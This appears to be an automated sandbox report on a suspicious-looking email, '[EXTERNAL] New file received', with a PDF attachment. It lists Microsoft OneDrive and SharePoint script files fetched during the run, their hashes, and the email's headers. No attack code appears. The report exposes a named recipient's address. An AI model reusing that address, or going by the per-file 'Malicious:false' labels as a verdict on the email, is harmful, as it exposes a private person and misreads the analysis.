0===a?document.createElement("img"):a,r=e.scenarioName,o=e.desiredSize,s=e.getContents,c={url:n,width:0,height:0},l=this._thumbnailCache,u=l.isLoaded(c),f=function(e){retu
                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                              File Type:Unicode text, UTF-8 text, with very long lines (2068)
                              Category:downloaded
                              Size (bytes):7639
                              Entropy (8bit):5.313088477551944
                              Encrypted:false
                              SSDEEP:
                              MD5:443B67413A46CB97F02BE976F7231483
                              SHA1:CF2E2162D42BBD679D590C8C2D34FE56C8036B9D
                              SHA-256:7A8A7038D57E1F44B0D8735EF6DC5724DB80B1DF60B6817EC05A6324CF80714B
                              SHA-512:5A1B6E5793D537D5A0371BDAE5AE2D3FB53A84805B1E7A66C18E59D428177980B339A29B9E34E34AC81B696FA09984BF463D4484FA951AA7F7E2E0F22629BBDA
                              Malicious:false
                              Reputation:unknown
                              URL:https://res-1.cdn.office.net/files/odsp-web-prod_2024-04-19.005/odblightspeedwebpack/15.js
                              Preview:"use strict";(self.odspNextWebpackJsonp=self.odspNextWebpackJsonp||[]).push([[15],{4517:function(e,t,n){n.d(t,{a:function(){return l}});var a=n("tslib_102"),i=n(441),r=n(820),o=n(3706),s=n(5),c=n(193),d=n(314),l=(0,i.e)({key:c.a,name:r.h,fieldName:"",minWidth:i.a.regularMin,maxWidth:i.a.regularMax,isCollapsable:!0,isResizable:!0,sortProps:i.b,data:{facets:(0,a.W_)({},d.a.pack("dateModifed"))}},o.a)(function(e,t){return function(){return{itemKey:t}}},function(e,t){return"".concat(e.demandItemFacet(s.j,t,{suppressGetItems:!0}))})}.,3707:function(e,t,n){n.d(t,{a:function(){return d}});var a=n(441),i=n(820),r=n(0),o=n(3708),s=n(5),c=n(1273),d=(0,a.e)({key:new r.a("modifiedByColumn").id,name:i.g,fieldName:"",minWidth:a.a.regularMin,maxWidth:a.a.regularMax,isCollapsable:!0,isResizable:!0},o.a)(function(e,t){var n=e.demandItem({modifiedByPerson:s.D},t).modifiedByPerson;return n&&n.itemKey?{people:[{itemKey:n.itemKey}]}:{people:[]}},function(e,t){return"".concat(e.demandItemFacet(c.a,t))})}.,3
                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                              File Type:ASCII text, with very long lines (691)
                              Category:downloaded
                              Size (bytes):973
                              Entropy (8bit):5.050758854362429
                              Encrypted:false
                              SSDEEP:
                              MD5:C68AAA6986DACA4015F39F32FD8E683A
                              SHA1:DB35EE9C61607E49D9E22753A94B4AAEB8824AC7
                              SHA-256:9BD75F1093D7F066DB42343530BB04B76B1F731E538AF6252DF4B99E7B055677
                              SHA-512:0FA623BCDC62058E93834A9121B16FCA33231ABCEF7DC427C95BFBE277EABE89A828499D3910ED17D1D1AEAAF1E0E232AAF1E631200CF1C8CF9BF9E9E144CEE1
                              Malicious:false
                              Reputation:unknown
                              URL:https://res-1.cdn.office.net/files/odsp-web-prod_2024-04-19.005/freemiumlistshomewebpack/en-us/deferred.resx.js
                              Preview:"use strict";(self.odspNextWebpackJsonp=self.odspNextWebpackJsonp||[]).push([["deferred.resx"],{393:e=>{e.exports=JSON.parse('{"a":"Provide feedback to Microsoft"}')}.,315:e=>{e.exports=JSON.parse('{"a":"My files"}')}.,386:e=>{e.exports=JSON.parse('{"a":"Library settings"}')}.,387:e=>{e.exports=JSON.parse('{"a":"Add an app","b":"Brand center (preview)","c":"Brand center","d":"Change the look","j":"Library settings","k":"List settings","r":"Site usage","s":"Site contents","w":"Site settings","u":"Site permissions","t":"Site information","i":"Hub site settings","m":"Recycle Bin","p":"What\\u0027s new","q":"Sign out","h":"Help","v":"Site designs","f":"Global navigation","x":"Apply a site template","l":"OneDrive settings","o":"Restore your OneDrive","g":"Connect to new Microsoft 365 Group","n":"Restore this library","B":"Manage Viva Connections","A":"Set up Viva Connections (Preview)","e":"Get the OneDrive apps","z":"Sync this OneDrive","y":"Video usage"}')}.}]);
                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                              File Type:Unicode text, UTF-8 text, with very long lines (11297)
                              Category:downloaded
                              Size (bytes):463258
                              Entropy (8bit):5.035628682202775
                              Encrypted:false
                              SSDEEP:
                              MD5:553415D64BE09CA62643674CFEE06A9E
                              SHA1:C3A6918A09207A100D2B9A4D9254F2998C4EB299
                              SHA-256:99EFD943FB58CBB2FD7882AB52974877E2F0782BADD120DB072252C9FF6306DB
                              SHA-512:CF9FA87010226E350B8504CD7202947364BC0699297645C37E02279EF6B0952CBF883128A4F82529A8E36CFBC6BD0A9CA30AFACA7F3F8A47217DC5CD9B98CCCF
                              Malicious:false
                              Reputation:unknown
                              URL:https://res-1.cdn.office.net/files/odsp-web-prod_2024-04-19.005/odblightspeedwebpack/en-us/ondemand.resx.js
                              Preview:"use strict";(self.odspNextWebpackJsonp=self.odspNextWebpackJsonp||[]).push([["ondemand.resx","deferred.resx"],{6163:function(e){e.exports=JSON.parse('{"a":"EnvironmentType is invalid","b":"Invalid GUID string: \\u0022{0}\\u0022","f":"The value for \\u0022{0}\\u0022 is false","g":"The value for \\u0022{0}\\u0022 must not be null","h":"The value for \\u0022{0}\\u0022 must not be undefined","e":"The value for \\u0022{0}\\u0022 must not be an empty string","d":"The \\u0022{0}\\u0022 object cannot be used because it has been disposed.","c":"Invalid version string: \\u0022{0}\\u0022","j":"Cannot consume services because the scope is not finished yet","k":"Cannot consume services during ServiceScope autocreation","i":"The ServiceScope is already finished","l":"Cannot register service because the scope is already finished","m":"The service key \\u0022{0}\\u0022 has already been registered in this scope","o":"INNERERROR:","n":"CALLSTACK:","p":"LOGPROPERTIES:"}')}.,6841:function(e){e.exports=JS
                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                              File Type:ASCII text, with very long lines (3444)
                              Category:downloaded
                              Size (bytes):15025
                              Entropy (8bit):5.394986968111675
                              Encrypted:false
                              SSDEEP:
                              MD5:9B8708C76B964372365EBDA8F5B29E97
                              SHA1:A7F91B1D29D42A8B1EC5B5200AC119A6B6300207
                              SHA-256:96A845AA6A378F46F5F77C08A86CEDCF208708A5E2F66F70C5C33BE5A3B82B09
                              SHA-512:4BE0F457BBC0FC04BEDC31B5AE42C99E29C5E651D35CDF9EB16A738C490CC8E86599E2D79FBE3B0049D55567964888D1E46D7FB77BC40E51DFFCE5DD3DD1EA6C
                              Malicious:false
                              Reputation:unknown
                              URL:https://res-1.cdn.office.net/files/odsp-web-prod_2024-04-19.005/odblightspeedwebpack/46.js
                              Preview:"use strict";(self.odspNextWebpackJsonp=self.odspNextWebpackJsonp||[]).push([[46,249,824],{6118:function(e,t,n){n.d(t,{a:function(){return s}});var a=n("react-lib"),i=n(1526),r=n(6119);(0,n("fui.util_150").pZ)([{rawString:".nameDialogDescription_ad4c6070{background:#deecf9;height:40px;display:flex;padding:8px 12px;margin-bottom:10px;overflow:hidden;animation-name:openAnimation_ad4c6070;animation-duration:750ms;animation-fill-mode:both;border-radius:4px}@keyframes openAnimation_ad4c6070{from{min-height:0;max-height:0}to{min-height:32px;max-height:64px}}.nameDialogDescriptionIcon_ad4c6070{color:#605e5c;pointer-events:none;padding:5px 6px 0 2px;text-align:center;height:32px;position:relative;display:flex;flex-wrap:nowrap;flex-shrink:0;font-size:16px;line-height:16px}.nameDialogDescriptionText_ad4c6070{color:#323130;padding:4px;font-size:12px}"}]);var o=n("fui.lco_35");function s(e){var t=e.oldName,n=e.newName,s=e.errorMessage,c=e.isShortcutWithColorPicker,d=(0,i.a)(n!==t,n!==t,[t]);return
                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                              File Type:ASCII text, with very long lines (21020)
                              Category:downloaded
                              Size (bytes):23796
                              Entropy (8bit):5.185880842105603
                              Encrypted:false
                              SSDEEP:
                              MD5:A4AAF63A0B3A02FC02724C5A1E06B253
                              SHA1:DD734FDC2EC46C7BE1B1AEC6765DA53FC38C1B0B
                              SHA-256:85E33BFD6B08B5E7D9B4A35D5258386EB49F682C569DC3342DEF44F89E1BED44
                              SHA-512:DAC407E880F451542B3AF0EF208EE06C032DC6DE2E8F33D29E7E697B7729B651D9BD874A14123A245C538B42377CAFC451B6F63273F4473C2577C5C8EFC554B6
                              Malicious:false
                              Reputation:unknown
                              URL:https://res-1.cdn.office.net/files/odsp-web-prod_2024-04-19.005/odblightspeedwebpack/4.js
                              Preview:"use strict";(self.odspNextWebpackJsonp=self.odspNextWebpackJsonp||[]).push([[4],{2343:function(e,t,n){n.d(t,{a:function(){return a},b:function(){return c},c:function(){return o},d:function(){return s},e:function(){return r}});var a,i=n(2063);!function(e){e[e.icon=16]="icon",e[e.iconMin=16]="iconMin",e[e.bigIcon=48]="bigIcon",e[e.bigIconMin=48]="bigIconMin",e[e.regularMin=90]="regularMin",e[e.regular=130]="regular",e[e.nameMin=220]="nameMin",e[e.nameODC=440]="nameODC",e[e.nameODB=280]="nameODB",e[e.originalLocation=300]="originalLocation",e[e.custom=900]="custom",e[e.sharedWith=150]="sharedWith",e[e.note=250]="note",e[e.dateModifiedMl=150]="dateModifiedMl",e[e.dotDotDot=32]="dotDotDot",e[e.ratingsMin=110]="ratingsMin"}(a||(a={}));var r,o={none:0,icon:1,name:2,title:3,calloutInvoker:4,shareHeroCommand:5,modified:6,url:7},s={none:0,notify:1,block:2,notifyAndBlock:3,blockSharing:4};!function(e){e[e.Auto=0]="Auto",e[e.Pinned=1]="Pinned",e[e.Removed=2]="Removed"}(r||(r={}));var c=i}.,2273:f
                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                              File Type:ASCII text, with very long lines (475)
                              Category:downloaded
                              Size (bytes):480
                              Entropy (8bit):5.222598038829303
                              Encrypted:false
                              SSDEEP:
                              MD5:AD55844E3938DF01F21D47B85245E6BC
                              SHA1:E9FB91E155D1AE074A7AFD79445E9C45E51BCBBD
                              SHA-256:91CC59DDD1CC556870C29DDAAACDE33E6D8DA9FFDF4B27984B5B9D5F647ED72B
                              SHA-512:C0AE762FEED11666624AC9247AE4F5A6F27479A58B80216BDC0D84FE0C7BF2633EE7ED42864D8316B0C568879663486613A0401F3AE621B973346C775EA5C9D5
                              Malicious:false
                              Reputation:unknown
                              URL:https://res-1.cdn.office.net/files/odsp-web-prod_2024-04-19.005/listsenterprise/87.js
                              Preview:"use strict";(self.odspNextWebpackJsonp=self.odspNextWebpackJsonp||[]).push([[87],{671:(e,t,n)=>{n.r(t),n.d(t,{ContextualMenu:()=>a.v2H,ContextualMenuBase:()=>a.sIi,ContextualMenuItem:()=>a.A55,ContextualMenuItemBase:()=>a.cYW,ContextualMenuItemType:()=>a.llj,DirectionalHint:()=>a.aZJ,canAnyMenuItemsCheck:()=>a.xQe,getContextualMenuItemClassNames:()=>a.Wyu,getContextualMenuItemStyles:()=>a.czg,getMenuItemStyles:()=>a.CXU,getSubmenuItems:()=>a.PkX});var a=n("fui.lco_35")}.}]);
                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                              File Type:ASCII text, with very long lines (31971)
                              Category:downloaded
                              Size (bytes):267267
                              Entropy (8bit):5.460614022216083
                              Encrypted:false
                              SSDEEP:
                              MD5:11EBA7A7A13DF731DE8B0DC776EB8E5F
                              SHA1:0F8AA8B321DBC863FBAEE54A3C88BA18C62F965A
                              SHA-256:DA8F70A81F7F46D335BCE383176AC4AC0C391F9B9C44CDB1992E77408D97FE62
                              SHA-512:CCBF9B864617C5834E8DD4D36A4189BE694824642A3A9F11715F2CF49390435DE2287462BB959C2B630A90493F3076AC32AE87F18F9F9776E62D06B84AAC6BC1
                              Malicious:false
                              Reputation:unknown
                              URL:https://res-1.cdn.office.net/files/odsp-web-prod_2024-04-19.005/odblightspeedwebpack/106.js
                              Preview:"use strict";(self.odspNextWebpackJsonp=self.odspNextWebpackJsonp||[]).push([[106,216,851,852,1027,1026,55],{4532:function(e,t,n){n.d(t,{a:function(){return u}});var a=n("tslib_102"),i=n("react-lib"),r=n(824),o=n(1311),s=n(1573),c={iconName:"FavoriteStar"},d={iconName:"FavoriteStarFill"};function l(e){var t;return(null===(t=e.actionState)||void 0===t?void 0:t.isToggled)?(0,a.W_)((0,a.W_)({},e),{iconProps:d,ariaLabel:s.d,title:s.d}):(0,a.W_)((0,a.W_)({},e),{iconProps:c,ariaLabel:s.a,title:s.a})}function u(e){return{key:r.a,iconOnly:!0,action:i.createElement(o.b,{itemKeys:[e]}),postProcess:l,automationId:"FieldRender-Followed"}}}.,6150:function(e,t,n){n.d(t,{a:function(){return f}});var a=n("tslib_102"),i=n("react-lib"),r=n(3),o=n(6151),s=n(5),c=n(6140),d=n(117),l=n(16),u=(0,d.a)()((0,l.a)(function(){return(0,a.Zd)(void 0,void 0,void 0,function(){return(0,a.qr)(this,function(e){switch(e.label){case 0:return[4,n.e(942).then(n.bind(n,3097))];case 1:return[2,e.sent().default]}})})})),f=(0,r
                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                              File Type:ASCII text, with very long lines (17457)
                              Category:downloaded
                              Size (bytes):20325
                              Entropy (8bit):5.434705117052957
                              Encrypted:false
                              SSDEEP:
                              MD5:4977FA595469A0C915879939037BD5EB
                              SHA1:8B038B8458D853FC1EC5E2EF14971932609EC46C
                              SHA-256:777BC48CF049581BCBE97FA841DD80E4E03A726545306405D7B2F2461F9E29E2
                              SHA-512:2E4833AB768CDF290BDF385BD507E5EB41309EFEB1C02FF6E0540FA64F85D4612525696D0BB924E6A03CC3B9421870B0186A9DE361614913554F9FD0CBD920E8
                              Malicious:false
                              Reputation:unknown
                              URL:https://res-1.cdn.office.net/files/odsp-web-prod_2024-04-19.005/metaosfilebrowser/18.js
                              Preview:"use strict";(self.odspNextWebpackJsonp=self.odspNextWebpackJsonp||[]).push([[18],{3638:(e,t,n)=>{var a,i,r;n.d(t,{a:()=>a,b:()=>i,c:()=>r}),function(e){e[e.regularUser=0]="regularUser",e[e.externalUser=1]="externalUser",e[e.group=2]="group",e[e.application=3]="application",e[e.linkedinUser=4]="linkedinUser"}(a||(a={})),function(e){e.graph="graph",e.sharepointSearch="sharepointSearch",e.substrate="substrate"}(i||(i={})),function(e){e.unified="unifiedGroup",e.securityGroup="securityGroup",e.SPGroup="SPGroup",e.PublicDistributionList="PublicDistributionList",e.family="family"}(r||(r={}))}.,6271:(e,t,n)=>{n.d(t,{a:()=>x});var a=n("tslib_102"),i=n(3638),r=n(3412),o=n("odsp.util_578"),s=n(135),c=n(5749),d=n(508),l=n(11),u=n(463),f=n(5482),p=n(5481),m=n(402),_=n(5750),h=n(5752),b=n(6272),g=n(12),v=n(3),y=!o.HW.isActivated("b7426b02-fdf6-4c5e-9809-e0c21db41db7","07/10/2022","remove hard code graph endpoint and read from spPageContextInfo")&&!o.tH.isFeatureEnabled({ECS:1026572}),S=!o.HW.isActi
                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                              File Type:ASCII text, with very long lines (6421)
                              Category:downloaded
                              Size (bytes):14002
                              Entropy (8bit):5.413448124208954
                              Encrypted:false
                              SSDEEP:
                              MD5:779421B9AD529C2901FCD31FCBBB9D7C
                              SHA1:6BB0F5D3D8FF8F6D9234D524EC7509F136416959
                              SHA-256:E4740FECEC9C0334BE117F8AADE770772A4AB8ADE9BA7F9C70BFCB9634993950
                              SHA-512:BDACBBDB96FFB7CCE25F91CAF6BAE2C278168CCDAAC4198375E8B936C401C16ACA0516C205EF8A9F33CB15041E025B0C23F718CEF1BA1583CF45BC5428330819
                              Malicious:false
                              Reputation:unknown
                              URL:https://res-1.cdn.office.net/files/odsp-web-prod_2024-04-19.005/listsenterprise/58.js
                              Preview:"use strict";(self.odspNextWebpackJsonp=self.odspNextWebpackJsonp||[]).push([[58],{1147:(e,t,n)=>{n.d(t,{a:()=>r});var a=n(5),i=n(149);function r(e,t,n){if(e.ViewType&&e.Id){var r=i.a.isAppView(e),o=e.Hidden&&!r,s=n===a.c.pictureLibrary&&"2"===e.BaseViewId&&window.location.pathname.toLowerCase()!==e.ServerRelativeUrl.toLowerCase();if(t||!o&&!s){var c=new i.a(e);if(c.viewType)return c}}}}.,698:(e,t,n)=>{n.r(t),n.d(t,{handleViewsKeyDown:()=>w,handleViewsOnClick:()=>E});var a=n("tslib_102"),i=n("fui.lco_35"),r=n(10),o=n(630),s=n(330),c=n(1),d=(0,n(13).a)({loader:function(){return(0,a.Zd)(void 0,void 0,void 0,function(){return(0,a.qr)(this,function(e){switch(e.label){case 0:return[4,Promise.all([n.e("fui.lcoms"),n.e("odsp.util"),n.e("fui.core"),n.e("fui.co"),n.e("fui.lcom"),n.e("ondemand.resx"),n.e(260)]).then(n.bind(n,1942))];case 1:return[2,e.sent().ViewContextMenu]}})})}});function l(e,t,n,a,i,r){e.render((0,c.h)(d,{key:s.w,parentNode:n,view:a,onDismiss:function(){return u(e)},contextua
                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                              File Type:ASCII text, with very long lines (7376)
                              Category:downloaded
                              Size (bytes):33195
                              Entropy (8bit):5.387558116642124
                              Encrypted:false
                              SSDEEP:
                              MD5:7CAA0A91538F5D06BB8FA1AB7B4EE252
                              SHA1:841176D8E325EC8E01E5D3FF6FC9319567866E99
                              SHA-256:FB7318BE54AFA55DEFBBC5297641E972D741F46EBDB4B62DE4A3FC376B4F672B
                              SHA-512:F299F9DCA72F8CF37FC014DF33B8FECAC9C6326607D89D9FA549D059D83498829131BE66B116312E1B20D7163B87993D67C8ADB5E515EAAF7E752E8F5D460A79
                              Malicious:false
                              Reputation:unknown
                              URL:https://res-1.cdn.office.net/files/odsp-web-prod_2024-04-19.005/@ms/stream-bundle/chunks/19446.js
                              Preview:"use strict";(self.webpackChunk_ms_stream_bundle=self.webpackChunk_ms_stream_bundle||[]).push([[19446,52315],{89349:(e,t,n)=>{n.d(t,{k:()=>r});var a=n(408156),i=n(640903);function r(e){var t=a.useState(e),n=t[0],r=t[1];return[n,{setTrue:(0,i.B)(function(){return function(){r(!0)}}),setFalse:(0,i.B)(function(){return function(){r(!1)}}),toggle:(0,i.B)(function(){return function(){r(function(e){return!e})}})}]}}.,349112:(e,t,n)=>{n.d(t,{G:()=>r});var a=n(408156),i=n(640903);function r(e,t,n){var r=a.useState(t),o=r[0],s=r[1],c=(0,i.B)(void 0!==e),d=c?e:o,l=a.useRef(d),u=a.useRef(n);a.useEffect(function(){l.current=d,u.current=n});var f=(0,i.B)(function(){return function(e,t){var n="function"==typeof e?e(l.current):e;u.current&&u.current(t,n),c||s(n)}});return[d,f]}}.,81745:(e,t,n)=>{n.d(t,{_:()=>l});var a=n(352609),i=n(295610),r=n(408156),o=n(761270),s=(0,n(196324).y)({cacheSize:100}),c=function(e){function t(){return null!==e&&e.apply(this,arguments)||this}return(0,i.__extends)(t,e),t.p
                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                              File Type:ASCII text, with very long lines (2876)
                              Category:downloaded
                              Size (bytes):2881
                              Entropy (8bit):5.125420224475196
                              Encrypted:false
                              SSDEEP:
                              MD5:57AA6C05FC208F0DFC2D2A8F8C7BC656
                              SHA1:619108FEBF01AE45930A5F3482C2E7137E931044
                              SHA-256:B7E85FF966424901F209FAD33822DC4A96F062478398D5FF52728F35E7244DB6
                              SHA-512:DEE415AEB2E8670B87A19A30B9A16CE904776A306FC23C6CB4A290E0D56451EF32BD7C9C82B8F80F2E309019EA29229D9B9F66F6277638434EC9A980E2CE5832
                              Malicious:false
                              Reputation:unknown
                              URL:https://res-1.cdn.office.net/files/odsp-web-prod_2024-04-19.005/listsenterprise/217.js
                              Preview:"use strict";(self.odspNextWebpackJsonp=self.odspNextWebpackJsonp||[]).push([[217],{1824:(e,t,n)=>{n.r(t),n.d(t,{default:()=>c,supportsServiceWorker:()=>d});var a=n("odsp.util_578"),i=n(7),r=n(2060),o=n(2058),s=a.HW.isActivated("669BDA54-62B3-4FDC-9FD3-541981584CE5","09/13/2023")?void 0:{resultType:i.b.ExpectedFailure,error:"Not supported"};const c=function(){function e(){var e=this;this._listeners=new Set,this._onMessage=function(t){var n=t.data;e._listeners.forEach(function(e){e(n)})},d()&&navigator.serviceWorker.addEventListener("message",this._onMessage)}return e.prototype.addListener=function(e){this._listeners.add(e)},e.prototype.removeListener=function(e){this._listeners.delete(e)},e.prototype.register=function(e,t,n,i,r){if(!d())return Promise.reject(s);var c=(0,o.a)(e,t,n,i,r);return navigator.serviceWorker.register(c,{scope:"/",updateViaCache:a.tH.isFeatureEnabled({ODB:1846})?"all":"none"})},e.prototype.registerAt=function(e,t,n,a){var i=this;return d()?Promise.resolve(e).cat
                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                              File Type:ASCII text, with very long lines (2741)
                              Category:downloaded
                              Size (bytes):7402
                              Entropy (8bit):5.391160852535504
                              Encrypted:false
                              SSDEEP:
                              MD5:AA1A6321E179050CAE408D7CD337FFB5
                              SHA1:D5B695B9D0C6FFFC5C8F39D4B3C966BA45D1456A
                              SHA-256:42CB75ABB4EE80770EEC5A3F951C68E6D18F2DAF1EBFD6B37DFC093C12D1BE6B
                              SHA-512:5B5542C42124164A6A0DE15F79AE11564213C1AF1D65E7E575B6E1DF54FF55CDD3E83B4B446B1FB36E4E3BFB8CB7AB2378190942DEEC237E4A33D2751A42D672
                              Malicious:false
                              Reputation:unknown
                              URL:https://res-1.cdn.office.net/files/odsp-web-prod_2024-04-19.005/odblightspeedwebpack/293.js
                              Preview:"use strict";(self.odspNextWebpackJsonp=self.odspNextWebpackJsonp||[]).push([[293],{3711:function(e,t,n){n.d(t,{a:function(){return o}});var a=n("react-lib"),i=n("fui.lco_35"),r=n("fui.util_150");(0,r.pZ)([{rawString:".DefaultIcon_a7ed68b5{font-size:16px}"}]);var o=function(e){var t=e.iconName,n=e.className,o=e.style,s=e.ariaLabel;return a.createElement("div",{style:o},a.createElement(i.k45,{"aria-label":s,className:(0,r.N0)("DefaultIcon_a7ed68b5",n),iconName:t}))}}.,3277:function(e,t,n){n.d(t,{a:function(){return r},b:function(){return o}});var a=n("react-lib"),i=n("fui.lcoms_307");(0,n("fui.util_150").pZ)([{rawString:".ms-DetailsRow .ms-Link,.ms-DetailsRow a.urlField_eb268185,.ms-DetailsRow a.urlField_eb268185:visited{cursor:pointer;text-decoration:none;font-size:"},{theme:"smallFontSize",defaultValue:"12px"},{rawString:"}.ms-DetailsRow .ms-Link:hover,.ms-DetailsRow a.urlField_eb268185:hover,.ms-DetailsRow a.urlField_eb268185:visited:hover{text-decoration:underline}.ms-DetailsRow a.m
                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                              File Type:PNG image data, 32 x 32, 8-bit/color RGBA, non-interlaced
                              Category:dropped
                              Size (bytes):626
                              Entropy (8bit):7.462170619898816
                              Encrypted:false
                              SSDEEP:
                              MD5:CE150D89756FEFAD35E3836DEA3B8D74
                              SHA1:A7DFE15727EFC3B4FDF5176D3E6D04EA88943794
                              SHA-256:069F3AEF53B7F07FAFA6AB7A3314513EAEE8830361B32B96CB4D2134C8A7A74E
                              SHA-512:F156E599C8BCC86174F44008A3D1185BA741EA4266CE92470C6DA010F898100F91C8EC87F35E8CE6216BE8A116622D8BAB33AD6E8922ADA58ED0DE5205E80D6A
                              Malicious:false
                              Reputation:unknown
                              Preview:.PNG........IHDR... ... .....szz.....pHYs.................sRGB.........gAMA......a.....IDATx..VK/.Q..Z..P.JKQtA$f...HDb!a..x-..?./...v.B.vl,$.ZX.M%.h.f..G...w...3......9..s.w.9wf.<r.E.0;51.Q(.!#.....M..qfz....B..@c...9..$..QC&..V"..g.|.`w.X-.v.......=..3.8.....d....0/E.;.....d.@M/`[.>.....u.............n....Mh...5-.._.+`.w.s.Eg@{..?EZ.p>z.|.b..........5.....".H&@...N.4.(f..gj..#. o.^......"5.t...v..F...eJ....O....*.%]..8..B..MR\I.h.]I.Z.8=.k..p??..$..k.....JJhq...4...I....h'...P.I%..e.3.....U....@....$}.dD.A&^_..;.T...iJI.O.})...J.?d[6. .."R..dL..b.....%....a.....3..ea~....@....7..Z.3.....IEND.B`.
                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                              File Type:XML 1.0 document, ASCII text, with very long lines (443), with no line terminators
                              Category:dropped
                              Size (bytes):443
                              Entropy (8bit):4.920679566192411
                              Encrypted:false
                              SSDEEP:
                              MD5:E0A40795A3DCFC0FF6E3060AE42B4139
                              SHA1:103AA9D566CE73524F15E89C792BFE2E59EB6512
                              SHA-256:84DFB688C8655E3A75E462F66F5A316E29F5DE5AE8D785822F8E4F9BFB6B79F5
                              SHA-512:C8A8BC4317E8BEA6513F0C33AD94D97E2D60BE9DAB1EA2FDE301B1007E7D866C39D9FACAC4EC2A3CFFF7CF7FC4F3E49C52B39BCE42E673F7F94D853B051667CE
                              Malicious:false
                              Reputation:unknown
                              Preview:<?xml version="1.0" encoding="utf-8"?><m:error xmlns:m="http://schemas.microsoft.com/ado/2007/08/dataservices/metadata"><m:code>-1, Microsoft.SharePoint.Client.ClientServiceException</m:code><m:message xml:lang="en-US">The HTTP method 'GET' cannot be used to access the resource 'RenderListDataAsStream'. The operation type of the resource is specified as 'Default'. Please use correct HTTP method to invoke the resource.</m:message></m:error>
                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                              File Type:ASCII text, with very long lines (12151)
                              Category:downloaded
                              Size (bytes):12156
                              Entropy (8bit):5.2925124677386295
                              Encrypted:false
                              SSDEEP:
                              MD5:FD3E00107BB46DDB1BE6E810324A227E
                              SHA1:1FF3D126176E2098C20EC0E0489F85AB0BD2ED51
                              SHA-256:8DD43A621F232A6A27BFB16F64425BC31B2E2851C8BBC113D9152836598C5461
                              SHA-512:2386CCDB8EF2E32052BAB4DBFF794043661577FEB245836B3A3A49E4054DCAD75C47E0A3D0EE11383B8556151FE68949B4E7C1AAB91FDB496F37004863F8C831
                              Malicious:false
                              Reputation:unknown
                              URL:https://res-1.cdn.office.net/files/odsp-web-prod_2024-04-19.005/@ms/stream-bundle/chunks/83417.js
                              Preview:"use strict";(self.webpackChunk_ms_stream_bundle=self.webpackChunk_ms_stream_bundle||[]).push([[83417],{383417:(e,t,n)=>{n.d(t,{Sg:()=>b});var a=n(295610),i=n(686247),r=n(188830),o=n(523499),s=n(693343),c=n(412616),d={DefaultSkip:0,DefaultTop:8,DefaultFaceTop:3,MaxTop:100},l=function(e){function t(n,a){var i=e.call(this,a)||this;return i.status=n,void 0!==typeof Object.setPrototypeOf&&Object.setPrototypeOf(i,t.prototype),i}return(0,a.__extends)(t,e),t}(Error),u=n(224252),f=n(822866);function p(e){return isFinite(e)&&!isNaN(e)}var m={timeoutMs:15e3,backoffTimeMultiplierMs:200,maxRetries:3,fallbackBackoffTimeFunction:function(e,t){return Math.pow(2,e)*t}},_="x-ms-client-request-id",h="Rest.performHealthCheck. Failed to reach our health URL. This means there is a client network issue.",b=function(){function e(){}return e.get=function(t,n,a,i,r,s,c,d){return void 0===d&&(d=o.F7.any),e.getWithResponse(t,n,a,i,r,s,c,d).then(function(e){return e[0]})},e.getWithResponse=function(t,n,a,r,s,c,d,
                              File type:RFC 822 mail, ASCII text, with CRLF line terminators
                              Entropy (8bit):6.126318926039926
                              TrID:
                              • E-Mail message (Var. 5) (54515/1) 100.00%
                              File name:[EXTERNAL] New file received.eml
                              File size:59'166 bytes
                              MD5:f8f87d22bc61a86fa89dd6be095d26e3
                              SHA1:16d082f6ef105742033d079edc31e71d68487833
                              SHA256:d414e9175e4c39f3c732959392185c72879c31a016e6434719e122fb3c4829bc
                              SHA512:fb158ae5f2ab57e6b03ab6e1446188fa5f781c1eb6a457430267b16db8f1cd547f047a72b10ba42c7f1332806db2304e3a80fcbe3e03727e249c6388b7bde7c6
                              SSDEEP:1536:NAMXCAxyMJyMRD9BX3L9T4ZNsooebwAgDUlFulxbNx2UQm:OmsynJTEnoeODWSxZx2a
                              TLSH:8943D04BFD462090FB70B1DFCF22FF5201572E9255D786C1B329C3A621CB2FA4A28416
                              File Content Preview:Received: from DM8PR08MB7477.namprd08.prod.outlook.com (2603:10b6:8:e::13) by.. LV8PR08MB9582.namprd08.prod.outlook.com with HTTPS; Wed, 24 Apr 2024 19:12:31.. +0000..Received: from CYZPR17CA0006.namprd17.prod.outlook.com (2603:10b6:930:8c::7).. by DM8PR0
                              Subject:[EXTERNAL] New file received
                              From:"douglas4783@icloud.com" <douglas4783@icloud.com>
                              To:Noemi Young <nyoung@olgoonik.com>
                              Cc:
                              BCC:
                              Date:Wed, 24 Apr 2024 19:12:24 +0000
                              Communications:
                                Attachments:
                                • doc.pdf
                                Key Value
                                Receivedfrom [127.0.0.1] (ms11p00im-dlb-asmtpmailmevip.me.com [17.57.154.19]) by ms11p00im-qufo17291201.me.com (Postfix) with ESMTPSA id 8B0FBC801D6 for <nyoung@olgoonik.com>; Wed, 24 Apr 2024 19:12:24 +0000 (UTC)
                                From"douglas4783@icloud.com" <douglas4783@icloud.com>
                                ToNoemi Young <nyoung@olgoonik.com>
                                Subject[EXTERNAL] New file received
                                Thread-Topic[EXTERNAL] New file received
                                Thread-IndexAQHalntbz9q8mWnb7UCDhpEGrC+9bg==
                                X-MS-Exchange-MessageSentRepresentingType1
                                DateWed, 24 Apr 2024 19:12:24 +0000
                                Message-ID<287839a0-0fbf-c1f1-481d-47c8137933c8@icloud.com>
                                Content-Languageen-US
                                X-MS-Exchange-Organization-AuthSource CY4PEPF0000EE35.namprd05.prod.outlook.com
                                X-MS-Exchange-Organization-SupervisoryReview-OcrResultLocation {"Status":"OcrRequired","CorrelationId":null,"Locations":null}
                                X-MS-Has-Attachyes
                                X-MS-Exchange-Organization-Network-Message-Id e861f639-b667-4cea-ef6d-08dc64927ad2
                                X-MS-TNEF-Correlator
                                X-MS-Exchange-Organization-RecordReviewCfmType0
                                x-ms-publictraffictypeEmail
